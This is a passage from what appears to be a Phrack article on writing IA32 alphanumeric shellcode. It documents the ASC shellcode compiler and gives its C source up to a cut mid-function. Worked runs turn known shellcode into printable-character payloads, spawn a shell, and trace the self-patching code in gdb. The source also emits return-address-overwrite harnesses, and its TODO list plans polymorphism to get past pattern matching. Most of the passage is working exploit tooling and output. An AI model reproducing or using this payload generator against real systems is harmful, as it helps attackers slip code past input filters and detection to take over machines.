 +-------------+---------call (3)--------------------------------+
 |             |
 |           build (1)
 |             |
 |   <---------+-------------------------------->
 |
 +-> [pop <r32>][decompression engine][jmp <r32>]
         (4)             (5)              (6)

Once the CALL ESP is executed (3), the address of [data] is pushed on the
stack. The engine only has to pop it in a register (4), can then
decompress the data to build the original shellcode (5), and finally jump
to it (6).

As we can see it, possibilities are really endless!



----| ASC, an Alphanumeric Shellcode Compiler


ASC offers some of the techniques proposed above.
What about the possible options?


COMPILATION OPTIONS:

These options allow us to specify the techniques and architecture the
alphanumeric shellcode will use to build the original shellcode.

-a[ddress] stack|<r32> : allows to specify the start address of the
 shellcode (useful for patching technique).
 "stack" means we get the address from the stack.
 <r32> allows to specify a register containing this starting address.
 
-m[ode] stack|patches : allows to choose the type of alphanumeric
shellcode we want to generate.
 "stack" generates our shellcode on the stack.
 "patches" generates our shellcode by XOR patching.
 
-s[tack] call|jmp|null|ret : specifies the method (if "-m stack") to
 return to the original shellcode on the stack.
 "call" uses a CALL ESP instruction.
 "jmp" uses a JMP ESP instruction.
 "null" doesn't return to the code (if the original code is right after
  the alphanumeric shellcode).
 "ret" uses PUSH ESP and RET instructions.


DEBUGGING OPTIONS:

These options permit us to insert some breakpoints (int3), and observe the
execution of our alphanumeric shellcode.

-debug-start : inserts a breakpoint to the start of the compiled
 shellcode.

-debug-build-original : inserts a breakpoint before to build the original
 shellcode.
 
-debug-build-jump : inserts a breakpoint before to build the jump code
 (if we specified the -s option). Useless if "-s null".

-debug-jump : inserts a breakpoint before to run the jump instruction
 (if we specified the -s option). If "-s null", the breakpoint will
 simply be at the end of the alphanumeric shellcode.

-debug-original : inserts a breakpoint to the beginning of the original
 shellcode. This breakpoint will be build at runtime.


INPUT/OUTPUT OPTIONS:

-c[har] <char[] name> : specifies a C variable name where a shellcode is
 stored:
 
 char array[]= "blabla" /* my shellcode */
               "blabla";
 
 If no name is specified and several char[] arrays are present, the first
 one will be used. The parsing recognizes C commentaries and multi-lines
 arrays. This option also assure us that the input file is a C file, and
 not a binary file.

-f[ormat] bin|c : specifies the output file format. If C format is chosen,
 ASC writes a tiny code to run the alphanumeric shellcode, by simulating
 a RET address overflow. This code cannot run correctly if "-a <r32>"
 or "-s null" options were used.
 
-o[utput] <output file> : allows to specify the output filename.


EXAMPLES:

Let's finish with some practical examples, using shellcodes from nice
previous Phrack papers ;)


First, have a look at P49-14 (Aleph One's paper).
The first shellcode he writes (testsc.c) contain 00 bytes (normally not a
problem for ASC). We generate a C file and an alphanumeric shellcode,
using "XOR patches":

 rix@debian:~/phrack$ ./asc -c shellcode -f c -o alpha.c p49-14
 Reading p49-14 ... (61 bytes)
 Shellcode (390 bytes):
 LLLLYhb0pLX5b0pLHSSPPWQPPaPWSUTBRDJfh5tDSRajYX0Dka0TkafhN9fYf1Lkb0TkdjfY0Lkf0Tkgfh6rfYf1Lki0tkkh95h8Y1LkmjpY0Lkq0tkrh2wnuX1Dks0tkwjfX0Dkx0tkx0tkyCjnY0LkzC0TkzCCjtX0DkzC0tkzCj3X0Dkz0TkzC0tkzChjG3IY1LkzCCCC0tkzChpfcMX1DkzCCCC0tkzCh4pCnY1Lkz1TkzCCCCfhJGfXf1Dkzf1tkzCCjHX0DkzCCCCjvY0LkzCCCjdX0DkzC0TkzCjWX0Dkz0TkzCjdX0DkzCjXY0Lkz0tkzMdgvvn9F1r8F55h8pG9wnuvjrNfrVx2LGkG3IDpfcM2KgmnJGgbinYshdvD9d
 Writing alpha.c ...
 Done.
 rix@debian:~/phrack$ gcc -o alpha alpha.c
 rix@debian:~/phrack$ ./alpha
 sh-2.03$ exit
 exit
 rix@debian:~/phrack$

It seems to work perfectly. Let's note the alphanumeric shellcode is also
written to stdout.


Now, let's compile Klog's shellcode (P55-08). We choose the "stack
technique", with a JMP ESP to return to our original shellcode. We also
insert some breakpoints:

 rix@debian:~/phrack$ ./asc -m stack -s jmp -debug-build-jump
  -debug-jump -debug-original -c sc_linux -f c -o alpha.c P55-08
 Reading P55-08 ... (50 bytes)
 Shellcode (481 bytes):
 LLLLZhqjj9X5qjj9HPWPPSRPPafhshfhVgfXf5ZHfPDhpbinDfhUFfXf5FifPDSDhHIgGX516poPDTYI11fhs2DTY01fhC6fXf5qvfPDfhgzfXf53EfPDTY01fhO3DfhF9fXf5yFfPDTY01fhT2DTY01fhGofXf5dAfPDTY01fhztDTY09fhqmfXf59ffPDfhPNDfhbrDTY09fhDHfXf5EZfPDfhV4fhxufXf57efPDfhl5DfhOSfXf53AfPDfhV4fhFafXf5GzfPDfhxGDTY01fh4IfXf5TFfPDfh7VDfhhvDTY01fh22fXf5m5fPDfh3VDfhWvDTY09fhKzfXf5vWfPDTY01fhe3Dfh8qfXf5fzfPfhRvDTY09fhXXfXf5HFfPDfh0rDTY01fhk5fXf5OkfPfhwPfXf57DfPDTY09fhz3DTY09SQSUSFVDNfhiADTY09WRa0tkbfhUCfXf1Dkcf1tkc3UX
 Writing alpha.c ...
 Done.
 
 rix@debian:~/phrack$ gcc -o alpha alpha.c 
 rix@debian:~/phrack$ gdb alpha
 GNU gdb 19990928
 Copyright 1998 Free Software Foundation, Inc.
 GDB is free software, covered by the GNU General Public License, and you are
 welcome to change it and/or distribute copies of it under certain conditions.
 Type "show copying" to see the conditions.
 There is absolutely no warranty for GDB.  Type "show warranty" for details.
 This GDB was configured as "i686-pc-linux-gnu"...
 (no debugging symbols found)... 
 (gdb) run
 Starting program: /home/rix/phrack/alpha
 (no debugging symbols found)...(no debugging symbols found)...
 Program received signal SIGTRAP, Trace/breakpoint trap.
 0xbffffb1d in ?? ()                          ;-debug-build-jump 
 (gdb) x/22i 0xbffffb1d
 0xbffffb1d:     push   %ebx
 0xbffffb1e:     push   %ecx
 0xbffffb1f:     push   %ebx                  ;EDX will contain 0xFFFFFFFF
 0xbffffb20:     push   %ebp
 0xbffffb21:     push   %ebx
 0xbffffb22:     inc    %esi                  ;ESI contains 0xFFFFFFFF.
 0xbffffb23:     push   %esi                  ;ESI contains 0.
 0xbffffb24:     inc    %esp                  ;00 00 00 on the stack.
 0xbffffb25:     dec    %esi                  ;restores ESI.
 0xbffffb26:     pushw  $0x4169               ;push an alphanumeric word.
 0xbffffb2a:     inc    %esp                  ;an alphanumeric byte on the
                                              ; stack.
 0xbffffb2b:     push   %esp
 0xbffffb2c:     pop    %ecx                  ;ECX contains ESP (the
                                              ; address of the byte).
 0xbffffb2d:     xor    %bh,(%ecx)            ;NOT on this byte (EBP will
                                              ; contain the dword offset).
 0xbffffb2f:     push   %edi                  ;ESI will contain 0xFFFFFFFF
 0xbffffb30:     push   %edx
 0xbffffb31:     popa
 0xbffffb32:     xor    %dh,0x62(%ebx,%ebp,2) ;NOT on the first byte to
                                              ; patch (our 0xCC, int3).
                                              ; Let's note the use of
                                              ; alphanumeric <disp8>, the
                                              ; use of EBX (address of our
                                              ; shellcode) and the use of
                                              ; EBP (the previously stored
                                              ; offset).
 0xbffffb36:     pushw  $0x4355
 0xbffffb3a:     pop    %ax                   ;AX contains 0x4355.
 0xbffffb3c:     xor    %ax,0x63(%ebx,%ebp,2) ;XOR the next 2 bytes
                                              ; (<disp8> is now 0x63).
 0xbffffb41:     xor    %si,0x63(%ebx,%ebp,2) ;NOT these 2 bytes. 
 (gdb) x/3bx 0xbffffb41+5                     ;O16 + XOR + ModR/M +
                                              ; SIB + <disp8> = 5 bytes
 0xbffffb46:     0x33    0x55    0x58         ;The 3 bytes we patched:
                                              ; NOT 0x33 = 0xCC => INT 3
                                              ; NOT (0x55 XOR 0x55) = 0xFF
                                              ; NOT (0x43 XOR 0x58) = 0xE4
                                              ;  => JMP ESP
 (gdb) cont
 Continuing.

 Program received signal SIGTRAP, Trace/breakpoint trap.
 0xbffffb47 in ?? ()                          ;-debug-jump
 (gdb) x/1i 0xbffffb47
 0xbffffb47:     jmp    *%esp                 ;our jump
 (gdb) info reg esp
 esp            0xbffffd41       -1073742527
 (gdb) cont                                   ;Let's run this JMP ESP.
 Continuing.

 Program received signal SIGTRAP, Trace/breakpoint trap.
 0xbffffd42 in ?? ()                          ;(previous ESP)+1
                                              ; (because of our INT3). We
                                              ; are now in our original
                                              ; shellcode.
 (gdb) cont                                   ;Let's run it ;)
 Continuing.
 sh-2.03$ exit                                ;Finally!!!
 exit
 (no debugging symbols found)...(no debugging symbols found)...
 Program exited normally.
 (gdb)



----| Conclusion


Writing IA32 alphanumeric shellcodes is finally easily possible. But using
only alphanumeric addresses is less obvious. In fact, this is the main
problem met when we simply want to use alphanumeric chars.

In some particular cases, it will however be possible. We'll try to return
to instructions that will themselves return to our shellcode. For example,
on Win32 systems, we can sometimes meet interesting instructions at
addresses like 0x0041XXXX (XX are alphanumeric chars). So we can generate
such return addresses.
Partial overwriting of addresses is sometimes also interesting, because we
can take advantage of bytes already present on the stack, and mainly take
advantage of the null byte (that we cannot generate), automatically copied
at the end of the C string.
Note that, sometimes, depending on what we try to exploit, we can use some
others chars, for example '_', '@', '-' or such classical characters. It
is obvious, in such cases, that they will be very precious.


The "stack technique" seems to need an executable stack... But we can
modify ESP's value at the beginning of our shellcode, and get it point to
our heap, for example. Our original shellcode will then be written to the
heap. However, we need to patch the POP ESP instruction, because it's not
"alphanumeric compliant".


Except, the size (it will possibly lead to some problems), we also must
mention another disadvantages of those techniques: compiled shellcodes
are vulnerable to toupper()/tolower() conversions. Writing an alphanumeric
and toupper()/tolower() resistant shellcode is nearly an impossible task
(remember the first array, with usable instructions).


This paper shows that, contrary to received ideas, an executable code can
be written, and stored nearly everywhere. Never trust anymore a string
that looks perfectly legal: perhaps is it a well disguised shellcode ;)


Thanks and Hello to (people are alphanumerically ordered :p ):
- Phrack staff.
- Devhell, HERT & TESO guys: particularly analyst, binf, gaius, mayhem,
   klog, kraken & skyper.
- dageshi, eddow, lrz, neuro, nite, obscurer, tsychrana.
                                                              rix@hert.org


----| Code

This should compile fine on any Linux box with "gcc -o asc asc.c".
It is distributed under the terms of the GNU GENERAL PUBLIC LICENSE.
If you have problems or comments, feel free to contact me (rix@hert.org).

<++> asc.c !707307fc
/******************************************************************************
 *                ASC : IA 32 Alphanumeric Shellcode Compiler                 *
 ******************************************************************************
 *
 * VERSION: 0.9.1
 *
 *
 * LAST UPDATE: Fri Jul 27 19:42:08 CEST 2001
 *
 *
 * LICENSE:
 *  ASC - Alphanumeric Shellcode Compiler
 *
 *  Copyright 2000,2001 - rix
 *
 *  All rights reserved.
 *
 *  Redistribution and use in source and binary forms, with or without
 *  modification, are permitted provided that the following conditions
 *  are met:
 *  1. Redistributions of source code must retain the above copyright
 *     notice, this list of conditions and the following disclaimer.
 *  2. Redistributions in binary form must reproduce the above copyright
 *     notice, this list of conditions and the following disclaimer in the
 *     documentation and/or other materials provided with the distribution.
 *
 *  THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 *  ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 *  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 *  ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 *  FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 *  DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 *  OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 *  HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 *  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 *  OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 *  SUCH DAMAGE.
 *
 *
 * TODO:
 *  - create LibASC, a library containing all functions.
 *  - permit specification of acceptable non-alphanumeric chars.
 *  - generate padding instructions sequences.
 *  - encode alphanumeric chars, to avoid pattern matching.
 *  - insert junk instructions (polymorphic stuff) and modify existing.
 *  - optimize "patch technique" when offset < 256 and is alphanumeric.
 *  - automatically calculate padding size for "stack without jump" technique.
 *  - C output format: simulate addresses in register, padding,...
 *  - use constant address for compiled shellcode.
 *  - modify ESP starting address for "stack technique".
 *  - simple shellcode formats conversion mode (no compilation).
 *  - insert spaces and punctuation to imitate classical sentences.
 *
 *
 * CONTACT: rix <rix@hert.org>
 *
 ******************************************************************************/

#include <stdio.h>
#include <getopt.h>
#include <stdarg.h>
#include <string.h>
#include <time.h>

/* +------------------------------------------------------------------------+ */
/* |                       RANDOM NUMBERS FUNCTIONS                         | */
/* +------------------------------------------------------------------------+ */

/* initialize the pseudo-random numbers generator */
/* ============================================== */
void random_initialize() {
 srand((unsigned int)time(0));
}


/* get a random integer i (0<=i<max) */
/* ================================= */
int random_get_int(int max) {
 return (rand()%max);
}

/* +------------------------------------------------------------------------+ */
/* |                         SHELLCODES FUNCTIONS                           | */
/* +------------------------------------------------------------------------+ */

/* this structure will contain all our shellcodes */
/* ============================================== */
struct Sshellcode {
 unsigned char* opcodes; /* opcodes bytes */
 int size; /* size of the opcodes bytes */
};


/* allocate a new Sshellcode structure */
/* =================================== */
struct Sshellcode *shellcode_malloc() {
 struct Sshellcode *ret;

 if ((ret=(struct Sshellcode*)malloc(sizeof(struct Sshellcode)))!=NULL) {
  ret->opcodes=NULL;
  ret->size=0;
 }
 return ret;
}


/* initialize an existing Sshellcode structure */
/* =========================================== */
void shellcode_zero(struct Sshellcode *shellcode) {
 if (shellcode==NULL) return;

 if (shellcode->opcodes!=NULL) free(shellcode->opcodes);
 shellcode->opcodes=NULL;
 shellcode->size=0;
}


/* free an existing Sshellcode structure */
/* ===================================== */
void shellcode_free(struct Sshellcode *shellcode) {
 if (shellcode!=NULL) {
  shellcode_zero(shellcode);
  free(shellcode);
 }
}


/* return an allocated string from an existing Sshellcode */
/* ====================================================== */
char *shellcode_malloc_string(struct Sshellcode *shellcode) {
 char *ret;

 if (shellcode==NULL) return NULL;

 if (shellcode->opcodes==NULL) return "";

 if ((ret=(char*)malloc(shellcode->size+1))==NULL) return NULL;
 memcpy(ret,shellcode->opcodes,shellcode->size);
 ret[shellcode->size]=0;
 return ret;
}


/* overwrite an existing Sshellcode with a Sshellcode */
/* ================================================== */
struct Sshellcode *shellcode_cpy(struct Sshellcode *destination,struct Sshellcode *source) {
 if (destination==NULL) return NULL;

 shellcode_zero(destination);

 if (source!=NULL) {
  if (source->opcodes!=NULL) { /* if source contains a shellcode, we copy it */
   if ((destination->opcodes=(unsigned char*)malloc(source->size))==NULL) return NULL;
   memcpy(destination->opcodes,source->opcodes,source->size);
   destination->size=source->size;
  }
 }

 return destination;
}


/* append a Sshellcode at the end of an existing Sshellcode */
/* ======================================================== */
struct Sshellcode *shellcode_cat(struct Sshellcode *destination,struct Sshellcode *source) {
 if (destination==NULL) return NULL;

 if (destination->opcodes==NULL) shellcode_cpy(destination,source);
 else { /* destination already contains a shellcode */

  if (source!=NULL) {
   if (source->opcodes!=NULL) { /* if source contain a shellcode, we copy it */

    if ((destination->opcodes=(unsigned char*)realloc(destination->opcodes,destination->size+source->size))==NULL) return NULL;
    memcpy(destination->opcodes+destination->size,source->opcodes,source->size);
    destination->size+=source->size;
   }
  }
 }
 return destination;
}


/* add a byte at the end of an existing Sshellcode */
/* =============================================== */
struct Sshellcode *shellcode_db(struct Sshellcode *destination,unsigned char c) {
 struct Sshellcode *ret,*tmp;

 /* build a tiny one byte Sshellcode */
 tmp=shellcode_malloc();
 if ((tmp->opcodes=(unsigned char*)malloc(1))==NULL) return NULL;
 tmp->opcodes[0]=c;
 tmp->size=1;

 /* copy it at the end of the existing Sshellcode */
 ret=shellcode_cat(destination,tmp);
 shellcode_free(tmp);
 return ret;
}


/* read a Sshellcode from a binary file */
/* ==================================== */
int shellcode_read_binary(struct Sshellcode *shellcode,char *filename) {
 FILE *f;
 int size;

 if (shellcode==NULL) return -1;

 if ((f=fopen(filename,"r+b"))==NULL) return -1;

 fseek(f,0,SEEK_END);
 size=(int)ftell(f);
 fseek(f,0,SEEK_SET);

 if ((shellcode->opcodes=(unsigned char*)realloc(shellcode->opcodes,shellcode->size+size))==NULL) return -1;
 if (fread(shellcode->opcodes+shellcode->size,size,1,f)!=1) {
  shellcode_zero(shellcode);
  return -1;
 }
 shellcode->size+=size;
 fclose(f);
 return shellcode->size;
}


/* read a Sshellcode from a C file */
/* =============================== */
#define LINE_SIZE 80*256
#define HEXADECIMALS "0123456789ABCDEF"

int shellcode_read_C(struct Sshellcode *shellcode,char *filename,char *variable) {
 FILE *f;
 struct Sshellcode *binary;
 unsigned char *hex,*p,c;
 int i;

 if (shellcode==NULL) return -1;

 hex=HEXADECIMALS;
 binary=shellcode_malloc();
 if (shellcode_read_binary(binary,filename)==-1) {
  shellcode_free(binary);
  return -1;
 }
 shellcode_db(binary,0); /* for string searching */
 p=binary->opcodes;

 while (p=strstr(p,"char ")) { /* "char " founded */
  p+=5;
  while (*p==' ') p++;
  if (!variable) { /* if no variable was specified */
   while ((*p!=0)&&(*p!='[')) p++; /* search for the '[' */
   if (*p==0) {
   shellcode_free(binary);
    return -1;
   }
  }
  else { /* a variable was specified */
   if (memcmp(p,variable,strlen(variable))) continue; /* compare the variable */
   p+=strlen(variable);
   if (*p!='[') continue;
  }
  /* *p='[' */
  p++;
  if (*p!=']') continue;
  /* *p=']' */
  p++;
  while ((*p==' ')||(*p=='\r')||(*p=='\n')||(*p=='\t')) p++;
  if (*p!='=') continue;
  /* *p='=' */
  p++;
  while (1) { /* search for the beginning of a "string" */
   while ((*p==' ')||(*p=='\r')||(*p=='\n')||(*p=='\t')) p++;

   while ((*p=='/')&&(*(p+1)=='*')) { /* loop until the beginning of a comment */
    p+=2;
    while ((*p!='*')||(*(p+1)!='/')) p++; /* search for the end of the comment */
    p+=2;
    while ((*p==' ')||(*p=='\r')||(*p=='\n')||(*p=='\t')) p++;
   }

   if (*p!='"') break; /* if this is the end of all "string" */
   /* *p=begin '"' */
   p++;
   while (*p!='"') { /* loop until the end of the "string" */
    if (*p!='\\') {
     shellcode_db(shellcode,*p);
    }
    else {
     /* *p='\' */
     p++;
     if (*p=='x') {
      /* *p='x' */
      p++;
      *p=toupper(*p);
      for (i=0;i<strlen(hex);i++) if (hex[i]==*p) c=i<<4; /* first digit */
      p++;
      *p=toupper(*p);
      for (i=0;i<strlen(hex);i++) if (hex[i]==*p) c=c|i; /* second digit */
      shellcode_db(shellcode,c); 
     }  
    }
    p++;
   }
   /* end of a "string" */
   p++;
  }
  /* end of all "string" */
  shellcode_free(binary);
  return shellcode->size;
 }
 shellcode_free(binary);
 return -1;
}


/* write a Sshellcode to a binary file */
/* =================================== */
int shellcode_write_binary(struct Sshellcode *shellcode,char *filename) {
 FILE *f;

 if (shellcode==NULL) return -1;

 if ((f=fopen(filename,"w+b"))==NULL) return -1;

 if (fwrite(shellcode->opcodes,shellcode->size,1,f)!=1) return -1;
 fclose(f);
 return shellcode->size;
}


/* write a Sshellcode to a C file */
/* ============================== */
int shellcode_write_C(struct Sshellcode *shellcode,char *filename) {
 FILE *f;
 char *tmp;
 int size;

 if (shellcode==NULL) return -1;

 if ((tmp=shellcode_malloc_string(shellcode))==NULL) return -1;

 if ((f=fopen(filename,"w+b"))==NULL) return -1; 

 fprintf(f,"char shellcode[]=\"%s\";\n",tmp);
 free(tmp);
 fprintf(f,"\n");
 fprintf(f,"int main(int argc, char **argv) {\n");
 fprintf(f," int *ret;\n");

 size=1;
 while (shellcode->size*2>size) size*=2;

 fprintf(f," char buffer[%d];\n",size);
 fprintf(f,"\n");
 fprintf(f," strcpy(buffer,shellcode);\n");
 fprintf(f," ret=(int*)&ret+2;\n");
 fprintf(f," (*ret)=(int)buffer;\n");
 fprintf(f,"}\n");

 fclose(f);
 return shellcode->size;
}


/* print a Sshellcode on the screen */
/* ================================ */
int shellcode_print(struct Sshellcode *shellcode) {
 char *tmp;

 if (shellcode==NULL) return -1;

 if ((tmp=shellcode_malloc_string(shellcode))==NULL) return -1;
 printf("%s",tmp);
 free(tmp);
 return shellcode->size;
}

/* +------------------------------------------------------------------------+ */
/* |                        IA32 MACROS DEFINITIONS                         | */
/* +------------------------------------------------------------------------+ */

/* usefull macro definitions */
/* ========================= */
/*
 SYNTAX:
  r=register
  d=dword
  w=word
  b,b1,b2,b3,b4=bytes
  n=integer index
  s=Sshellcode
*/

/* registers */
#define EAX 0
#define EBX 3
#define ECX 1
#define EDX 2
#define ESI 6
#define EDI 7
#define ESP 4
#define EBP 5
#define REGISTERS 8

/* boolean operators (bytes) */
#define XOR(b1,b2) (((b1&~b2)|(~b1&b2))&0xFF)
#define NOT(b) ((~b)&0xFF)

/* type constructors */
#define DWORD(b1,b2,b3,b4) ((b1<<24)|(b2<<16)|(b3<<8)|b4) /* 0xb1b2b3b4 */
#define WORD(b1,b2) ((b1<<8)|b2) /* 0xb1b2 */

/* type extractors  (0=higher 3=lower) */
#define BYTE(d,n) ((d>>(n*8))&0xFF) /* get n(0-3) byte from (d)word d */


/* IA32 alphanumeric instructions definitions */
/* ========================================== */

#define DB(s,b) shellcode_db(s,b);

/* dw b1 b2 */
#define DW(s,w)  \
 DB(s,BYTE(w,0)) \
 DB(s,BYTE(w,1)) \

/* dd b1 b2 b3 b4 */
#define DD(s,d)  \
 DB(s,BYTE(d,0)) \
 DB(s,BYTE(d,1)) \
 DB(s,BYTE(d,2)) \
 DB(s,BYTE(d,3)) \

#define XOR_ECX_DH(s) \
 DB(s,'0')            \
 DB(s,'1')            \

#define XOR_ECX_BH(s) \
 DB(s,'0')            \
 DB(s,'9')            \

#define XOR_ECX_ESI(s) \
 DB(s,'1')             \
 DB(s,'1')             \

#define XOR_ECX_EDI(s) \
 DB(s,'1')             \
 DB(s,'9')             \

// xor [base+2*index+disp8],r8
#define XORsib8(s,base,index,disp8,r8) \
 DB(s,'0')                             \
 DB(s,(01<<6|r8   <<3|4   ))           \
 DB(s,(01<<6|index<<3|base))           \
 DB(s,disp8)                           \

// xor [base+2*index+disp8],r32
#define XORsib32(s,base,index,disp8,r32) \
 DB(s,'1')                               \
 DB(s,(01<<6|r32  <<3|4   ))             \
 DB(s,(01<<6|index<<3|base))             \
 DB(s,disp8)                             \

#define XOR_AL(s,b) \
 DB(s,'4')          \
 DB(s,b)            \

#define XOR_AX(s,w) \
 O16(s)             \
 DB(s,'5')          \
 DW(s,w)            \

#define XOR_EAX(s,d) \
 DB(s,'5')           \
 DD(s,d)             \

#define INCr(s,r) DB(s,('A'-1)|r)
#define DECr(s,r) DB(s,'H'|r)
#define PUSHr(s,r) DB(s,'P'|r)
#define POPr(s,r) DB(s,'X'|r)
#define POPAD(s) DB(s,'a')
#define O16(s) DB(s,'f')

#define PUSHd(s,d) \
 DB(s,'h')         \
 DD(s,d)           \

#define PUSHw(s,w) \
 O16(s)            \
 DB(s,'h')         \
 DW(s,w)           \

#define PUSHb(s,b) \
 DB(s,'j')         \
 DB(s,b)           \

#define INT3(s) \
 DB(s,'\xCC')   \

#define CALL_ESP(s) \
 DB(s,'\xFF')       \
 DB(s,'\xD4')       \

#define JMP_ESP(s) \
 DB(s,'\xFF')      \
 DB(s,'\xE4')      \

#define RET(s) \
 DB(s,'\xC3')  \

/* +------------------------------------------------------------------------+ */
/* |                    ALPHANUMERIC MANIPULATIONS FUNCTIONS                | */
/* +------------------------------------------------------------------------+ */

#define ALPHANUMERIC_BYTES "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMOPQRSTUVWXYZ"

/* return 1 if the byte is alphanumeric */
/* ==================================== */
int alphanumeric_check(unsigned char c) {
 if (c<'0') return 0;
 else if (c<='9') return 1;
 else if (c<'A') return 0;
 else if (c<='Z') return 1;
 else if (c<'a') return 0;
 else if (c<='z') return 1;
 else return 0;
}


/* return a random alphanumeric byte */
/* ================================= */
unsigned char alphanumeric_get_byte() {
 unsigned char *bytes=ALPHANUMERIC_BYTES;

 return bytes[random_get_int(strlen(bytes))];
}


/* return a random alphanumeric byte b (c=CATEGORY_XOR,(b XOR(b XOR c))) */
/* ===================================================================== */
unsigned char alphanumeric_get_complement(unsigned char c) {
 unsigned char ret;

 while (1) {
  ret=alphanumeric_get_byte();
  if (alphanumeric_check(XOR(c,ret))) return ret;
 }
}

/* +------------------------------------------------------------------------+ */
/* |                      REGISTERS MANIPULATIONS FUNCTIONS                 | */
/* +------------------------------------------------------------------------+ */

/* return a random register in a set of allowed registers */
/* ====================================================== */
#define M_EAX (1<<EAX)
#define M_EBX (1<<EBX)
#define M_ECX (1<<ECX)
#define M_EDX (1<<EDX)
#define M_ESI (1<<ESI)
#define M_EDI (1<<EDI)
#define M_ESP (1<<ESP)
#define M_EBP (1<<EBP)
#define M_REGISTERS (M_EAX|M_EBX|M_ECX|M_EDX|M_ESI|M_EDI|M_ESP|M_EBP)

int alphanumeric_get_register(int mask) {
 int regs[REGISTERS];
 int size,i;

 size=0;
 for (i=0;i<REGISTERS;i++) { /* for all possible registers */
  if (mask&(1<<i)) regs[size++]=i; /* add the register if it is in our mask */
 }
 return regs[random_get_int(size)];
}


/* return a "POPable" register (ECX|EDX) with the shellcode's base address using the return address on the stack */
/* ============================================================================================================= */
int alphanumeric_get_address_stack(struct Sshellcode *s) {
 unsigned char ret;

 if (s==NULL) return -1;

 DECr(s,ESP); /* dec esp */
 DECr(s,ESP); /* dec esp */
 DECr(s,ESP); /* dec esp */
 DECr(s,ESP); /* dec esp */
 ret=alphanumeric_get_register(M_ECX|M_EDX); /* get a random register */
 POPr(s,ret); /* pop ecx/edx =>pop the return value from the stack */
 return ret;
}


/* initialize registers (reg=shellcode's base address) */
/* =================================================== */
int alphanumeric_initialize_registers(struct Sshellcode *s,unsigned char reg) {
 unsigned char b[4];
 int i;

 if (s==NULL) return -1;

 if (reg==EAX) {
  PUSHr(s,EAX);                                   /* push eax =>address */
  reg=alphanumeric_get_register(M_ECX|M_EDX); /* get a random register */
  POPr(s,reg);                                    /* pop ecx/edx */
 }
 for (i=0;i<4;i++) b[i]=alphanumeric_get_byte(); /* get a random alphanumeric dword */
 PUSHd(s,DWORD(b[0],b[1],b[2],b[3]));             /* push '????' */
 POPr(s,EAX);                                     /* pop eax */ 
 XOR_EAX(s,DWORD(b[0],b[1],b[2],b[3]));           /* xor eax,'????' =>EAX=0 */
 DECr(s,EAX);                                     /* dec eax  =>EAX=FFFFFFFF */
 PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EAX */
 PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>ECX */
 PUSHr(s,EAX);                                    /* push eax =>EDX=FFFFFFFF */
 PUSHr(s,EAX);                                    /* push eax =>EBX=FFFFFFFF */
 PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>ESP */
 PUSHr(s,reg);                                    /* push reg =>EBP=address */
 PUSHr(s,EAX);                                    /* push eax =>ESI=FFFFFFFF */
 PUSHr(s,EAX);                                    /* push eax =>EDI=FFFFFFFF */
 POPAD(s);                                        /* popad */
 return 0;
}

/* +------------------------------------------------------------------------+ */
/* |                        STACK MANIPULATIONS FUNCTIONS                   | */
/* +------------------------------------------------------------------------+ */

/* return the category of the byte */
/* =============================== */
#define CATEGORY_NULL 0
#define CATEGORY_00 1
#define CATEGORY_FF 2
#define CATEGORY_ALPHA 3
#define CATEGORY_ALPHA_NOT 4
#define CATEGORY_XOR 5
#define CATEGORY_XOR_NOT 6

int alphanumeric_stack_get_category(unsigned char c) {
 if (c==0) return CATEGORY_00;
 else if (c==0xFF) return CATEGORY_FF;
 else if (alphanumeric_check(c)) return CATEGORY_ALPHA;
 else if (c<0x80) return CATEGORY_XOR;
 else { /* need a NOT */
  c=NOT(c);
  if (alphanumeric_check(c)) return CATEGORY_ALPHA_NOT;
  else return CATEGORY_XOR_NOT;
 }
}


/* make a NOT on 1,2,3 or 4 bytes on the stack */
/* =========================================== */
int alphanumeric_stack_generate_not(struct Sshellcode *s,int size) {
 if (s==NULL) return -1;

 PUSHr(s,ESP); /* push esp */
 POPr(s,ECX);  /* pop ecx */

 switch(size) {
 case 1:
  if (alphanumeric_get_register(M_EDX|M_EBX)==EDX) {
   XOR_ECX_DH(s); /* xor [ecx],dh */
  }
  else {
   XOR_ECX_BH(s); /* xor [ecx],bh */
  }
  break;

 case 2:
  if (alphanumeric_get_register(M_ESI|M_EDI)==ESI) {
   O16(s);XOR_ECX_ESI(s); /* xor [ecx],si */
  }
  else {
   O16(s);XOR_ECX_EDI(s); /* xor [ecx],di */
  }
  break;

 case 3:
  DECr(s,ECX);     /* dec ecx */
 case 4:
  if (alphanumeric_get_register(M_ESI|M_EDI)==ESI) {
   XOR_ECX_ESI(s); /* xor [ecx],esi */
  }
  else {
   XOR_ECX_EDI(s); /* xor [ecx],edi */
  }
  break;
 }
 return 0;
}


/* generate 1,2,3 or 4 bytes from a category on the stack */
/* ====================================================== */
#define SB1 b[size-1]
#define SB2 b[size-2]
#define SB3 b[size-3]
#define SB4 b[size-4]

int alphanumeric_stack_generate_push(struct Sshellcode *s,int category,unsigned char *bytes,int size) {
 int reg,i;
 unsigned char b[4];
 unsigned char xSB1,xSB2,xSB3,xSB4;

 if (s==NULL) return -1;

 memcpy(b,bytes,4);

 /* possibly realize a NOT on b[] */
 if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) {
  for (i=0;i<size;i++) b[i]=NOT(b[i]);
 }

 /* generate bytes on the stack */
 switch(category) {
 case CATEGORY_00:
 case CATEGORY_FF:
